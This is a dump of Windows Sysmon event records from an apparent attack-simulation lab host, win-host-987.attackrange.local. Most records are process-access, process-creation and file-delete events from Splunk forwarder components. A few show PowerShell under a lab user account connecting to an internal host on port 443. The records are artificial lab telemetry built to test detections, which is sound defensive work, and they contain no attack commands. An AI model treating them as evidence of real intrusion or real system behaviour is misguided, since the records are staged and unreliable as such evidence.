EventID=10; RecordID=36497515; UtcTime=2021-09-14 13:17:38.619; SourceProcessGUID={B81B27B7-4012-611D-0C00-00000000C801}; SourceProcessId=732; SourceThreadId=4464; SourceImage=C:\Windows\system32\svchost.exe; TargetProcessGUID={B81B27B7-4013-611D-2500-00000000C801}; TargetProcessId=1820; TargetImage=C:\Windows\sysmon64.exe; GrantedAccess=0x1400; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
EventID=10; RecordID=36497514; UtcTime=2021-09-14 13:17:38.619; SourceProcessGUID={B81B27B7-4012-611D-0500-00000000C801}; SourceProcessId=420; SourceThreadId=984; SourceImage=C:\Windows\system32\csrss.exe; TargetProcessGUID={B81B27B7-A0F2-6140-8456-04000000C801}; TargetProcessId=5964; TargetImage=C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe; GrantedAccess=0x1fffff; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f
EventID=10; RecordID=36497513; UtcTime=2021-09-14 13:17:38.619; SourceProcessGUID={B81B27B7-4013-611D-2700-00000000C801}; SourceProcessId=2076; SourceThreadId=3760; SourceImage=C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe; TargetProcessGUID={B81B27B7-A0F2-6140-8456-04000000C801}; TargetProcessId=5964; TargetImage=C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe; GrantedAccess=0x1fffff; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
EventID=1; RecordID=36497512; UtcTime=2021-09-14 13:17:38.604; ProcessGuid={B81B27B7-A0F2-6140-8456-04000000C801}; ProcessId=5964; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe; FileVersion=8.0.2; Description=Registry monitor; Product=splunk Application; Company=Splunk Inc.; OriginalFileName=splunk-regmon.exe; CommandLine="C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"; CurrentDirectory=C:\Windows\system32\; User=NT AUTHORITY\SYSTEM; LogonGuid={B81B27B7-4012-611D-E703-000000000000}; LogonId=0x3e7; TerminalSessionId=0; IntegrityLevel=System; Hashes=MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25; ParentProcessGuid={B81B27B7-4013-611D-2700-00000000C801}; ParentProcessId=2076; ParentImage=C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe; ParentCommandLine="C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service
EventID=23; RecordID=36497511; UtcTime=2021-09-14 13:17:38.372; ProcessGuid={B81B27B7-4024-611D-7300-00000000C801}; ProcessId=2188; User=NT AUTHORITY\SYSTEM; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational; Hashes=MD5=16F2BDE0F695CD31EE12C24C9D637B16,SHA256=72960B429B15B66A1AC14A1D975B051ED24CE0EFEBFDB46D0B5555102E6BCC16,IMPHASH=00000000000000000000000000000000; IsExecutable=false; Archived=false - insufficient disk space
EventID=10; RecordID=36497510; UtcTime=2021-09-14 13:17:38.072; SourceProcessGUID={B81B27B7-A0F1-6140-8356-04000000C801}; SourceProcessId=5596; SourceThreadId=6824; SourceImage=C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe; TargetProcessGUID={B81B27B7-4013-611D-2700-00000000C801}; TargetProcessId=2076; TargetImage=C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe; GrantedAccess=0x101400; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
EventID=10; RecordID=36497535; UtcTime=2021-09-14 13:17:39.590; SourceProcessGUID={B81B27B7-4012-611D-0C00-00000000C801}; SourceProcessId=732; SourceThreadId=4464; SourceImage=C:\Windows\system32\svchost.exe; TargetProcessGUID={B81B27B7-4013-611D-1500-00000000C801}; TargetProcessId=1168; TargetImage=C:\Windows\system32\svchost.exe; GrantedAccess=0x1400; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
EventID=10; RecordID=36497534; UtcTime=2021-09-14 13:17:39.590; SourceProcessGUID={B81B27B7-4012-611D-0C00-00000000C801}; SourceProcessId=732; SourceThreadId=4464; SourceImage=C:\Windows\system32\svchost.exe; TargetProcessGUID={B81B27B7-4013-611D-1500-00000000C801}; TargetProcessId=1168; TargetImage=C:\Windows\system32\svchost.exe; GrantedAccess=0x1400; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
EventID=10; RecordID=36497533; UtcTime=2021-09-14 13:17:39.590; SourceProcessGUID={B81B27B7-4012-611D-0C00-00000000C801}; SourceProcessId=732; SourceThreadId=4464; SourceImage=C:\Windows\system32\svchost.exe; TargetProcessGUID={B81B27B7-4013-611D-1500-00000000C801}; TargetProcessId=1168; TargetImage=C:\Windows\system32\svchost.exe; GrantedAccess=0x1400; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
EventID=23; RecordID=36497532; UtcTime=2021-09-14 13:17:39.521; ProcessGuid={B81B27B7-4024-611D-7300-00000000C801}; ProcessId=2188; User=NT AUTHORITY\SYSTEM; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_Operational; Hashes=MD5=CACB6C08A5E25123FF6A019E89807CC5,SHA256=BBB624DDB826A4C31C5D26BB7709AFE867D1B5B0ED2BF34B70DA615B013F87AF,IMPHASH=00000000000000000000000000000000; IsExecutable=false; Archived=false - insufficient disk space
EventID=23; RecordID=36497531; UtcTime=2021-09-14 13:17:39.403; ProcessGuid={B81B27B7-4024-611D-7300-00000000C801}; ProcessId=2188; User=NT AUTHORITY\SYSTEM; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational; Hashes=MD5=1B2B1BD3F96A1ED3265F80FF190198C0,SHA256=8D2EB5A84A2C08B6CC0C98DA69B2B997BEC59BFB2F4C28BD2B3D3DC7F178D23E,IMPHASH=00000000000000000000000000000000; IsExecutable=false; Archived=false - insufficient disk space
EventID=10; RecordID=36497530; UtcTime=2021-09-14 13:17:39.318; SourceProcessGUID={B81B27B7-4014-611D-3000-00000000C801}; SourceProcessId=3144; SourceThreadId=3164; SourceImage=C:\Windows\system32\conhost.exe; TargetProcessGUID={B81B27B7-A0F3-6140-8556-04000000C801}; TargetProcessId=720; TargetImage=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe; GrantedAccess=0x1fffff; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
EventID=10; RecordID=36497529; UtcTime=2021-09-14 13:17:39.318; SourceProcessGUID={B81B27B7-4012-611D-0C00-00000000C801}; SourceProcessId=732; SourceThreadId=4464; SourceImage=C:\Windows\system32\svchost.exe; TargetProcessGUID={B81B27B7-4013-611D-2500-00000000C801}; TargetProcessId=1820; TargetImage=C:\Windows\sysmon64.exe; GrantedAccess=0x1400; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
EventID=10; RecordID=36497528; UtcTime=2021-09-14 13:17:39.318; SourceProcessGUID={B81B27B7-4012-611D-0C00-00000000C801}; SourceProcessId=732; SourceThreadId=4464; SourceImage=C:\Windows\system32\svchost.exe; TargetProcessGUID={B81B27B7-4013-611D-2500-00000000C801}; TargetProcessId=1820; TargetImage=C:\Windows\sysmon64.exe; GrantedAccess=0x1400; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
EventID=10; RecordID=36497527; UtcTime=2021-09-14 13:17:39.318; SourceProcessGUID={B81B27B7-4012-611D-0C00-00000000C801}; SourceProcessId=732; SourceThreadId=4464; SourceImage=C:\Windows\system32\svchost.exe; TargetProcessGUID={B81B27B7-4013-611D-2500-00000000C801}; TargetProcessId=1820; TargetImage=C:\Windows\sysmon64.exe; GrantedAccess=0x1400; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
EventID=10; RecordID=36497526; UtcTime=2021-09-14 13:17:39.318; SourceProcessGUID={B81B27B7-4012-611D-0C00-00000000C801}; SourceProcessId=732; SourceThreadId=4464; SourceImage=C:\Windows\system32\svchost.exe; TargetProcessGUID={B81B27B7-4013-611D-2500-00000000C801}; TargetProcessId=1820; TargetImage=C:\Windows\sysmon64.exe; GrantedAccess=0x1400; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
EventID=10; RecordID=36497525; UtcTime=2021-09-14 13:17:39.318; SourceProcessGUID={B81B27B7-4012-611D-0500-00000000C801}; SourceProcessId=420; SourceThreadId=536; SourceImage=C:\Windows\system32\csrss.exe; T
argetProcessGUID={B81B27B7-A0F3-6140-8556-04000000C801}; TargetProcessId=720; TargetImage=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe; GrantedAccess=0x1fffff; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f
EventID=10; RecordID=36497524; UtcTime=2021-09-14 13:17:39.318; SourceProcessGUID={B81B27B7-4013-611D-2700-00000000C801}; SourceProcessId=2076; SourceThreadId=3760; SourceImage=C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe; TargetProcessGUID={B81B27B7-A0F3-6140-8556-04000000C801}; TargetProcessId=720; TargetImage=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe; GrantedAccess=0x1fffff; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
EventID=1; RecordID=36497523; UtcTime=2021-09-14 13:17:39.304; ProcessGuid={B81B27B7-A0F3-6140-8556-04000000C801}; ProcessId=720; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe; FileVersion=8.0.2; Description=Windows Print Monitor; Product=splunk Application; Company=Splunk Inc.; OriginalFileName=splunk-winprintmon.exe; CommandLine="C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"; CurrentDirectory=C:\Windows\system32\; User=NT AUTHORITY\SYSTEM; LogonGuid={B81B27B7-4012-611D-E703-000000000000}; LogonId=0x3e7; TerminalSessionId=0; IntegrityLevel=System; Hashes=MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748; ParentProcessGuid={B81B27B7-4013-611D-2700-00000000C801}; ParentProcessId=2076; ParentImage=C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe; ParentCommandLine="C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service
EventID=23; RecordID=36497538; UtcTime=2021-09-14 13:17:40.452; ProcessGuid={B81B27B7-4024-611D-7300-00000000C801}; ProcessId=2188; User=NT AUTHORITY\SYSTEM; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security; Hashes=MD5=053BED5C4A8BE1A77FACB3AE38331655,SHA256=1E0933F1059FE85309E9616773E5E22BCC21DEFACFAC525B4FA2AADB3DAC364A,IMPHASH=00000000000000000000000000000000; IsExecutable=false; Archived=false - insufficient disk space
EventID=23; RecordID=36497537; UtcTime=2021-09-14 13:17:40.437; ProcessGuid={B81B27B7-4024-611D-7300-00000000C801}; ProcessId=2188; User=NT AUTHORITY\SYSTEM; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational; Hashes=MD5=D3E3D7C72CA7B38D0ABF30D4BC28EDB7,SHA256=DA71B6BF782552D30681C4D3F31CB18F51244B58ACC55CCB8E53A6EB0BEC1C04,IMPHASH=00000000000000000000000000000000; IsExecutable=false; Archived=false - insufficient disk space
EventID=3; RecordID=36497536; UtcTime=2021-09-14 13:18:10.150; ProcessGuid={B81B27B7-4822-613A-788F-03000000C801}; ProcessId=6940; Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; User=ATTACKRANGE\REED_SCHMIDT; Protocol=tcp; Initiated=true; SourceIsIpv6=false; SourceIp=10.0.1.15; SourceHostname=win-host-987.attackrange.local; SourcePort=50540; SourcePortName=-; DestinationIsIpv6=false; DestinationIp=10.0.1.16; DestinationHostname=ip-10-0-1-16.us-west-2.compute.internal; DestinationPort=443; DestinationPortName=https
EventID=23; RecordID=36497539; UtcTime=2021-09-14 13:17:41.469; ProcessGuid={B81B27B7-4024-611D-7300-00000000C801}; ProcessId=2188; User=NT AUTHORITY\SYSTEM; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational; Hashes=MD5=884EA898E14B03794C9867FCE7D7FF5D,SHA256=446FE8A360BAF31ECF3F609BEEB81A0D78DE6023CAEF3DA96F9237BAE32E91EF,IMPHASH=00000000000000000000000000000000; IsExecutable=false; Archived=false - insufficient disk space
EventID=23; RecordID=36497541; UtcTime=2021-09-14 13:17:42.503; ProcessGuid={B81B27B7-4024-611D-7300-00000000C801}; ProcessId=2188; User=NT AUTHORITY\SYSTEM; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational; Hashes=MD5=20DBBA8C7350C1B6352FB16EB54C2DD2,SHA256=DBC439FA149E83C0BD31E19EBC309C4E2FDABC8EB43670336AF9F82C0B5D3566,IMPHASH=00000000000000000000000000000000; IsExecutable=false; Archived=false -
insufficient disk space 354300x800000000000000036497540Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:11.936{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50541-false10.0.1.12-8000- 23542300x800000000000000036497543Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:43.549{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=2C52F53057B082F62618F6EC2C493D6E,SHA256=7DBC266122710D3A9EB74236C1F0E3C3B34BF454C1A319B2649FF956B4FC4D8E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497542Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:43.533{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=93DE402E6458BF050B84454DD61A3535,SHA256=F06BAD93EA3DCF400A027D59A28AA34EA00079127932755495CB7B73F2724E85,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497545Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:44.548{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D85AED58A2B43F8010CD0FC30DCDC20,SHA256=7802DA5CE5F5067FBA611AA99DB06DA4E2C8B9F9467F3D2C2F03F583430F9C64,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497544Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:14.173{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50542-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036497546Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:45.565{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FCE5F63F1988530615E31CB7ED4B5963,SHA256=8BEB8105F512BD9E8E653B9B1CA4EA70013C6DE9D4A8CD5CA3146BF01F5210EC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497547Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:46.614{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=196FFD2D000C4099DC7C4CD6DF57347E,SHA256=0F7ADD5FF23B3F41C75683CF54F91BB7772C3BA12EC5488F9F744558FC8DF280,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497549Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:47.629{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6DDB67CCE323EB88EA8804E09E23E085,SHA256=73F5D58418C0DB629AA125D701A9A5BCED846795C34CEB33DA6EC21A6BE5E5C0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497548Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:17.699{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50543-false10.0.1.12-8000- 23542300x800000000000000036497551Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:48.666{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=ABC4932DE85EE3001B7BC863317C266F,SHA256=0299D382B6CF8AEBF3ADB6BE12CB0E69D3BEAE64D5DA0EE87EA7C8D7C37B7F0B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497550Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:48.662{B81B27B7-4024-611D-7300-00000000C801}2188NT 